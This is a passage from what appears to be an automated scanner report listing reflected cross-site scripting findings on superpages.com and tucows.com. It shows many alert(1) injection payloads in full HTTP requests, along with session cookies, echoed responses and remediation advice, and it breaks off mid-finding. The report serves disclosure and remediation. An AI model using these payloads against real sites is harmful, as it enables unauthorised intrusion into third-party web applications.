GET /?bd053--><script>alert(1)</script>e1950324e3f=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:59 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:59 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&bd053--><script>alert(1)</script>e1950324e3f=1#" rel="nofollow"> ...[SNIP]...
The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48986"%3balert(1)//3db88e4ace3 was submitted in the cg parameter. This input was echoed as 48986";alert(1)//3db88e4ace3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:19:13 GMT Server: Unspecified Vary: Host Connection: close Content-Type: application/javascript Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:34:13 GMT;path=/
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]... <a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=948986";alert(1)//3db88e4ace3&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\"> ...[SNIP]...
3.232. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:24 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.234. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/about.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 32110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.236. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/advertise.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:15 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.239. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/affiliate/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.241. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/author_ratings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 34722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.243. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
